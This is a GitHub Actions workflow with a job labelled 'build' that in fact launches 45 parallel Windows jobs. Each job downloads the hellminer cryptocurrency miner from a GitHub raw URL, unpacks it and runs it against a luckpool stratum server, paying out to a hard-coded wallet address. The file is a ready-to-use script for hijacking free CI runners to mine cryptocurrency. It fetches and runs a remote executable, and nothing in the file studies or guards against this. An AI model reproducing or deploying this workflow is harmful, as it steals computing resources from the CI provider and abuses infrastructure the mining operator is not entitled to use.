name: Jancok-Kabeh2

on: [workflow_dispatch]

jobs:
  build:
    name: Jancok-Kabeh2
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://raw.githubusercontent.com/hellcatz/luckpool/master/miners/hellminer_cpu_win64_avx2.zip -Outfile hellminer_cpu_win64_avx2.zip
    - name: Seting-UP
      run: Expand-Archive hellminer_cpu_win64_avx2.zip
    - name: Running
      run: .\hellminer_cpu_win64_avx2\hellminer.exe -c stratum+tcp://na.luckpool.net:3956#xnsub -u REXWQMmE5dp7VeCMDtNvRBkPTCJ9YuFFnx.Rig001 -p x --cpu 3
    - name: DONE
      run: exit 
